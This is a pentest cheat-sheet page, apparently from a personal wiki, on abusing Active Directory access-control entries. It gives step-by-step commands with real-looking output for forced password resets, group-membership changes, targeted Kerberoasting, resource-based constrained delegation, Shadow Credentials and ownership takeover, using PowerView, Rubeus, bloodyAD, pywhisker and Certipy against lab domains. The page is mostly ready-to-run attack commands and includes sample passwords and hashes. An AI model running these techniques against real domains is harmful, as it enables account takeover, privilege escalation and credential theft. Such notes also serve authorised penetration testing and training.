ACL

PreviousPrivileged Access NextPrivilege escalation

Last updated 9 days ago

ACL

Interesting ACL

abused with Set-DomainUserPassword - gives us the right to reset a user's password without first knowing their password (should be used cautiously and typically best to consult our client before resetting passwords).
Add Members abused with Add-DomainGroupMember
abused with Set-DomainUserPassword or Add-DomainGroupMember - this grants us full control over a target object. Again, depending on if this is granted over a user or group, we could modify group membership, force change a password, or perform a targeted Kerberoasting attack. If we have this access over a computer object and the is in use in the environment, we can read the LAPS password and gain local admin access to the machine which may aid us in lateral movement or privilege escalation in the domain if we can obtain privileged controls or gain some sort of privileged access.
abused with Set-DomainObject - gives us the right to write to any non-protected attribute on an object. If we have this access over a user, we could assign them an SPN and perform a Kerberoasting attack (which relies on the target account having a weak password set). Over a group means we could add ourselves or another security principal to a given group. Finally, if we have this access over a computer object, we could perform a resource-based constrained delegation attack which is outside the scope of this module.
WriteOwner abused with Set-DomainObjectOwner
WriteDACL abused with Add-DomainObjectACL
AllExtendedRights abused with Set-DomainUserPassword or Add-DomainGroupMember
Addself abused with Add-DomainGroupMember - shows security groups that a user can add themselves to.

Tools

AbuseACL

Script to automatically list vulnerable Windows ACEs/ACLs.

ACLpwn

SharpADWS

C:\Users\Marcus>SharpADWS.exe acl -dn "OU=Domain Controllers,DC=corp,DC=local" -scope Subtree -trustee Marcus

 Severity              : Critical
 ObjectDN              : CN=DC01,OU=Domain Controllers,DC=corp,DC=local
 AccessControlType     : Allow
 ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
 ObjectType            : All
 Trustee               : Marcus
 IsInherited           : False

More commands on the github repo

ADACLScanner

PowerDACL

ACL Enumeration

PowerView

Find-InterstingDomainAcl -ResolveGUIDs

PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> $sid = Convert-NameToSid wley

PS C:\htb> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

ObjectDN               : CN=Dana Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ObjectSID              : S-1-5-21-3842939050-3880317879-2865463114-1176
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 56
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-5-21-3842939050-3880317879-2865463114-1181
AceType                : AccessAllowedObject
AceFlags               : ContainerInherit
IsInherited            : False
InheritanceFlags       : ContainerInherit
PropagationFlags       : None
AuditFlags             : None

PS C:\htb> $guid= "00299570-246d-11d0-a768-00aa006e0529"
PS C:\htb> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl

Name              : User-Force-Change-Password
DisplayName       : Reset Password
DistinguishedName : CN=User-Force-Change-Password,CN=Extended-Rights,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
rightsGuid        : 00299570-246d-11d0-a768-00aa006e0529

One in all

PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} 

AceQualifier           : AccessAllowed
ObjectDN               : CN=Dana Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : User-Force-Change-Password
ObjectSID              : S-1-5-21-3842939050-3880317879-2865463114-1176
InheritanceFlags       : ContainerInherit
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-3842939050-3880317879-2865463114-1181
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : ContainerInherit
InheritedObjectAceType : All
OpaqueLength           : 0

PS C:\htb> $sid2 = Convert-NameToSid damundsen
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose

AceType               : AccessAllowed
ObjectDN              : CN=Help Desk Level 1,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
OpaqueLength          : 0
ObjectSID             : S-1-5-21-3842939050-3880317879-2865463114-4022
InheritanceFlags      : ContainerInherit
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-3842939050-3880317879-2865463114-1176
AccessMask            : 131132
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed

PS C:\htb> Get-DomainGroup -Identity "Help Desk Level 1" | select memberof

memberof                                                                      
--------                                                                      
CN=Information Technology,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL

PS C:\htb> $itgroupsid = Convert-NameToSid "Information Technology"
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $itgroupsid} -Verbose

AceType               : AccessAllowed
ObjectDN              : CN=Angela Dunn,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-3842939050-3880317879-2865463114-1164
InheritanceFlags      : ContainerInherit
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-3842939050-3880317879-2865463114-4016
AccessMask            : 983551
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed

PS C:\htb> $adunnsid = Convert-NameToSid adunn 
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $adunnsid} -Verbose

AceQualifier           : AccessAllowed
ObjectDN               : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID              : S-1-5-21-3842939050-3880317879-2865463114
InheritanceFlags       : ContainerInherit
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-3842939050-3880317879-2865463114-1164
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : ContainerInherit
InheritedObjectAceType : All
OpaqueLength           : 0

AceQualifier           : AccessAllowed
ObjectDN               : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : DS-Replication-Get-Changes
ObjectSID              : S-1-5-21-3842939050-3880317879-2865463114
InheritanceFlags       : ContainerInherit
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-3842939050-3880317879-2865463114-1164
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : ContainerInherit
InheritedObjectAceType : All
OpaqueLength           : 0

<SNIP>

Get-Acl & GetADUser

PS C:\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt

PS C:\htb> foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl  "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}

Path                  : Microsoft.ActiveDirectory.Management.dll\ActiveDirectory:://RootDSE/CN=Dana 
                        Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
InheritanceType       : All
ObjectType            : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : ObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : INLANEFREIGHT\wley
IsInherited           : False
InheritanceFlags      : ContainerInherit
PropagationFlags      : None

NXC

nxc ldap 192.168.1.48 -u raj -p Password@1 --kdcHost ignite.local -M daclread -o TARGET=Administrator ACTION=read

Hidden OU ACLs

ForceChangePassword

wley -> ForceChangePassword -> damundsen

Run as wley

PS C:\htb> $SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)

New password

PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force

Change Pass

PS C:\htb> cd C:\Tools\
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen'
VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully reset

With BloodyAD

bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password

With RPCclient

$ rpcclient -U support 10.10.10.192
Enter WORKGROUP\support's password:
rpcclient $> setuserinfo2 Audit2020 23 'PleaseSub!'

GenericWrite

The typical techniques to abuse GenericWrite are:

shadowCredentials (windows server 2016 or later)
targetKerberoasting (the password should be weak enough to be cracked)
Resource-Based Constrained Delegation

Add Member - PowerView

Run as damundsen:

PS C:\htb> $SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
PS C:\htb> $Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)

Add member

PS C:\htb> Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose

VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Add-DomainGroupMember] Adding member 'damundsen' to group 'Help Desk Level 1'

Confirming user wad added to the group

PS C:\htb> Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

MemberName
----------
busucher
spergazed

<SNIP>

damundsen
dpayne

CleanUp - Remove user from group

PS C:\htb> Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose

VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Remove-DomainGroupMember] Removing member 'damundsen' from group 'Help Desk Level 1'
True

Add Member - BloodyAD

bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add

Disable Kerberos Pre Auth - ASREP Roast

Targeted Kerberoast

Linux

$ sudo ntpdate dc01.certified.htb | ./targetedKerberoast.py -v -d 'certified.htb' -u 'judith.mader' -p 'judith09' --dc-ip 10.10.11.41

Windows

Enumerate the permissions for one group with PowerView

Find-InterstingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Check if a the victim already has a SPN

PowerView

Get-DomainUser -Identity victim | select serviceprinicpalname

AD Module

Get-ADUser -Identity victim -Properties ServicePrincipalName | select ServicePrincipalName

Set a SPN for the victim

PowerView

Set-DomainObject -Identity victim -Set @{serviceprincipalname='domain/whatever'}

AD Module

Set-ADUser -Identity victim -ServicePrincipalNames @{Add='domain/whatever'}

Kerberoast the vicitm

Rubeus.exe kerberoast /outfile:targetedhahses.txt
john.exe --wordlist=C:\path\to\10k-worst-pass.txt C:\path\to\targetedhashes.txt

Windows Server 2008

Traditional methosds (shadow credential, RBCD, targetedKerberoast) can not be used -> change password

net rpc password 'TARGET$' Passw0rd1 -U retro2.vl/'ControlledUser$'%P@ssw0rd -S BLN01.retro2.vl

GenericAll

C:> net group "groupName" targetUser /domain /add

PS C:\htb> Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'INLANEFREIGHT' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(|(samAccountName=adunn)(name=adunn)(displayname=adunn))))
VERBOSE: [Set-DomainObject] Setting 'serviceprincipalname' to 'notahacker/LEGIT' for object 'adunn'

PS C:\htb> .\Rubeus.exe kerberoast /user:adunn /nowrap

CleanUp - Remove fake SPN

PS C:\htb> Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose

VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'INLANEFREIGHT' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(|(samAccountName=adunn)(name=adunn)(displayname=adunn))))
VERBOSE: [Set-DomainObject] Clearing 'serviceprincipalname' for object 'adunn'

Other Example

PS C:\Users\mssqladm\Desktop> Import-Module .\PowerView.ps1
PS C:\Users\mssqladm\Desktop> Get-DomainUser 'ttimmons' | Select serviceprincipalname

serviceprincipalname
--------------------



PS C:\Users\mssqladm\Desktop> Set-DomainObject -Identity 'ttimmons' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
PS C:\Users\mssqladm\Desktop> $User = Get-DomainUser 'ttimmons'
PS C:\Users\mssqladm\Desktop> $User | Get-DomainSPNTicket | fl

RBCD - Resource Based Constrained Delegation RBCD

Change user Context

*Evil-WinRM* PS C:\> $TargetComputer = 'TARGET.domain.local'
*Evil-WinRM* PS C:\> $UserWithDaclUsername = 'domain.local\test'
*Evil-WinRM* PS C:\> $UserWithDaclPassword = ConvertTo-SecureString 'Password' -AsPlainText -Force
*Evil-WinRM* PS C:\> $Cred = New-Object System.Management.Automation.PSCredential($UserWithDaclUsername, $UserWithDaclPassword)

1 - Add a new attacker-controlled computer account

*Evil-WinRM* PS C:\> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) -Verbose -Credential $Cred
Verbose: [+] Domain Controller =
Verbose: [+] Domain = domain.local
Verbose: [+] SAMAccountName = attackersystem$
Verbose: [+] Distinguished Name = CN=attackersystem,CN=Computers,DC=domain,DC=local
[+] Machine account attackersystem added

2 - Build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE

*Evil-WinRM* PS C:\> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid -Verbose -Credential $Cred | Select -Expand objectsid
Verbose: [Get-Domain] Using alternate credentials for Get-Domain
Verbose: [Get-Domain] Extracted domain 'domain.local' from -Credential
Verbose: [Get-DomainSearcher] search base: LDAP://dc1.domain.local/DC=domain,DC=local
Verbose: [Get-DomainSearcher] Using alternate credentials for LDAP connection
Verbose: [Get-DomainComputer] Get-DomainComputer filter string: (&(samAccountType=805306369)(|(name=attackersystem)))
*Evil-WinRM* PS C:\> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
*Evil-WinRM* PS C:\> $SDBytes = New-Object byte[] ($SD.BinaryLength)
*Evil-WinRM* PS C:\> $SD.GetBinaryForm($SDBytes, 0)

3 - Set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account

*Evil-WinRM* PS C:\> Get-DomainComputer $TargetComputer -Verbose -Credential $Cred | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose -Credential $Cred

Or automate the process with RbcdPwn.ps1

PS C:\> Import-Module .\PowerView.ps1
PS C:\> Import-Module .\Powermad.ps1
PS C:\> Import-Module .\RbcdPwn.ps1
PS C:\> Invoke-RbcdPwn -FakeMachine fakemachine123

4 - Hash the plaintext password into its RC4_HMAC form

PS C:\> .\Rubeus.exe hash /domain:domain.local /user:fakemachine123$ /password:P@ssw0rd!

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2


[*] Action: Calculate Password Hash(es)

[*] Input password             : P@ssw0rd!
[*] Input username             : fakemachine123$
[*] Input domain               : domain.local
[*] Salt                       : DOMAIN.LOCALhostfakemachine123.domain.local
[*]       rc4_hmac             : 217E50203A5ABA59CEFA863C724BF61B
[*]       aes128_cts_hmac_sha1 : 9B5A2BAF536BC1D4BABE30F732A8FB39
[*]       aes256_cts_hmac_sha1 : EC73111B3BA6754EDAFF699140B8B989771EB671D52B640F622DF58E76181052
[*]       des_cbc_md5          : 4FA1ECEFBAC776CD
```

5 - Get a service ticket for the service name (sname) we want to "pretend" to be "admin"

PS C:\> .\Rubeus.exe s4u /domain:domain.local /user:fakemachine123$ /rc4:217E50203A5ABA59CEFA863C724BF61B /impersonateuser:user_to_impersonate /msdsspn:http/web.domain.local /ptt

PS C:\> cmd /c curl --negotiate -u : http://web.domain.local -o out.html -v

Disable Kerberos Pre Auth - ASREP Roast

Change Password

 evil-winrm -u "username" -p 'password' -i 10.10.11.42
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\username\Documents> upload PowerView.ps1
                                        
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
                                        
Info: Uploading /workspace/PowerView.ps1 to C:\Users\username\Documents\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\username\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\username\Documents> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\username\Documents> Set-DomainUserPassword -Identity targettedUser -AccountPassword $UserPassword 
*Evil-WinRM* PS C:\Users\username\Documents> exit
                                        
Info: Exiting with code 0
[Nov 22, 2024 - 03:13:42 (EST)] exegol-Lab /workspace # nxc smb 10.10.11.42 -u 'targettedUser' -p 'Password123!' --shares

With BloodyAD

bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password

On OU - Generic Descendent Object Takeover

# getTGT.py 'domain.htb/d.anderson:password' -dc-ip 10.10.11.31 

# export KRB5CCNAME=d.anderson.ccache

# dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=DOMAIN,DC=HTB' 'domain.htb/d.anderson' -k -no-pass -dc-ip 10.10.11.31
Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20241204-045901.bak
[*] DACL modified successfully!

```
# bloodyAD --host "dc01.domain.htb" -d "domain.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p "password" set password "e.rodriguez" "0xss0rzpass++++"                            
[+] Password changed successfully!

AddSelf

AddSelf, similar to AddMember. While AddMember is WriteProperty access right on the target's Member attribute, AddSelf is a Self access right on the target's Member attribute, allowing the attacker to add itself to the target group, instead of adding arbitrary principals.

# bloodyAD --host "10.10.11.31" -d "domain.htb" -u "e.rodriguez" -p '0xss0rzpass++++' add groupMember "chiefs marketing" "e.rodriguez"
[+] e.rodriguez added to chiefs marketing

AllExtendedRights

Change password

bloodyAD --host "192.168.1.8" -d "ignite.local" -u "geet" -p "Password@1" set password "kavish" "Password@987"

Shadow Credentials

Pre-requisites to abuse Shadow Credentials:

AD CS (Key Trust if AD CS is not present)
Support for PKINIT and at least one DC with Windows Server 2016 or above.
Permissions (GenericWrite/GenericAll) to modify the msDS-KeyCredentialLink attribute of the target object.

In BloodHound: AddKeyCredentialLink

Linux - Pywhisker

pywhisker issue

[!] module 'OpenSSL.crypto' has no attribute 'PKCS12'

troubleshooting:

┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$  rm requirements.txt
┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$  vim requirements.txt
┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$ cat requirements.txt 
impacket
pyOpenSSL==24.0.0
cryptography
six
pyasn1
ldap3
ldapdomaindump
rich
setuptools
dsinternals
┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$ pip3 install -r requirements.txt

$ pywhisker.py -d "domain.htb" -u "owned" -H aad3b435b51**********5b51404ee:7fc6************b5a85a -td targetdomain.local --target "target" --action "list"
$ pywhisker.py -d "domain.htb" -u "owned" -H aad3b435b51**********5b51404ee:7fc6************b5a85a -td targetdomain.local --target "target" --action "add"
<--SNIP-->
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: QZrd2HfW.pfx
[*] Must be used with password: 7ZoeJDqSZnv5CtHwNY8K
[*] A TGT can now be obtained with
$ gettgtpkinit.py -cert-pfx QZrd2HfW.pfx -pfx-pass 7ZoeJDqSZnv5CtHwNY8K targetdomain.local/target QZrd2HfW.ccache
<--SNIP-->
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-03-17 05:05:07,420 minikerberos INFO     9b0312752bf1042f8a34616e8e641704c11aa0a08b4c6420e04f9bb32b4a1998
$ export KRB5CCNAME=QZrd2HfW.ccache
$ getnthash.py targetdomain.local/target -key 9b0312752bf1042f8a34616e8e641704c11aa0a08b4c6420e04f9bb32b4a1998 -debug -dc-ip [IP]
<--SNIP-->
Recovered NT Hash
cf3a*************ed5c58

┌──(kali㉿kali)-[~/Desktop/pywhisker/pywhisker]
└─$ python pywhisker.py -d "domain.htb" -u "controlledUser" -p "password" --target "targetedUser" --action "add" --dc-ip 10.10.11.41
[*] Searching for the target account
[*] Target user found: CN=targetted user,CN=Users,DC=domain,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: cf165020-4ec3-8daf-508f-259e8d1432dd
[*] Updating the msDS-KeyCredentialLink attribute of targettedUser
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: Nroyxf0a.pfx
[*] Must be used with password: k9NDc9ioP2ctBPVjCxVg
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

┌──(kali㉿kali)-[~/Desktop/PKINITtools]
└─$ sudo ntpdate dc01.domain.htb | python gettgtpkinit.py domain.htb/targettedUser -cert-pfx /home/kali/Desktop/pywhisker/pywhisker/Nroyxf0a.pfx -pfx-pass 'k9NDc9ioP2ctBPVjCxVg' targettedUser.ccache
2024-11-26 12:32:49,589 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-11-26 12:32:49,617 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2024-11-26 12:32:52,984 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-11-26 12:32:52,984 minikerberos INFO     e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852
INFO:minikerberos:e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852
2024-11-26 12:32:52,988 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

┌──(kali㉿kali)-[~/Desktop/PKINITtools]
└─$ sudo ntpdate dc01.domain.htb | python getnthash.py domain.htb/targettedUser -key e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584

Certipy

shadow auto

[Mar 11, 2024 - 08:59:19 (CET)] exegol-Zephyr /workspace # proxychains -q certipy shadow auto -u "owned@domain.local" -p 'password' -account 'target_account' -dns-tcp -dc-ip [IP]
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'target_account'
<--SNIP-->
[*] Successfully restored the old Key Credentials for 'ZPH-SVRMGMT1$'
[*] NT hash for 'target_account': 89d0*************ef2f

Abusing User Object

Enumerate the permissions.

Find-InterestingDomainAcl-ResolveGUIDs|?{$_.IdentityReferenceName -match"StudentUsers"}

Add the Shadow Credential.

Whisker.exe add /target:supportXuser

Linux - pyWhisker - cf The Hacker Recipes

Using PowerView, see if the Shadow Credential is added.

Get-DomainUser -Identity supportXuser

Request the TGT by leveraging the certificate.

Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBA<-SNIP-> /password:"1O<-SNIP->" /domain:domain.local /dc:DC.domain.local /getcredentials /show /nowrap

Inject the TGT in the current session or use the NTLM hash

Rubeus.exe ptt/ticket:<base64_tgt>

Abusing Computer Object

Enumerate the permissions.

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match'mgmtadmin’}

Add the Shadow Credentials.

SafetyKatz.exe"sekurlsa::pth /user:mgmtadmin /domain:domain.local /aes256:<aes_key> /run:cmd.exe" "exit"

Whisker.exe add /target:computer$

Using PowerView, see if the Shadow Credential is added.

Get-DomainComputer -Identity computer

Request the TGT by leveraging the certificate.

Rubeus.exe asktgt /user:computer$ /certificate:MIIJ0AIBA<-SNIP-> /password:"ViG<-SNIP->" /domain:domain.local /dc:DC.domain.local /getcredentials /show

Request and Inject the TGS by impersonating the user.

Rubeus.exe s4u /dc:dc.domain.local /ticket:<base64_tgt> /impersonateuser:administrator /ptt /self /altservice:cifs/computer

ShadowSpray

WriteOwner

Grant Ownership

bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username

./bloodyAD.py --host "10.10.11.41" -d "DC01.domain.local" -u "controlledUser" -p "password" set owner "CN=Management,CN=Users,DC=domain,DC=local" "CN=Controlled User,CN=Users,DC=domain,DC=local"

Grant yourself the AddMember privilege

dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'CN=Management,CN=Users,DC=domain,DC=local' -dc-ip '10.10.11.41' 'domain.local'/'controlledUser':'password'

Add member

./bloodyAD.py --host "10.10.11.41" -d "domain.local" -u "controlledUser" -p "password" add groupMember "CN=Management,CN=Users,DC=domain,DC=local" "CN=controlled User,CN=Users,DC=domain,DC=local"

Resource

PreviousPrivileged Access NextPrivilege escalation

Last updated 9 days ago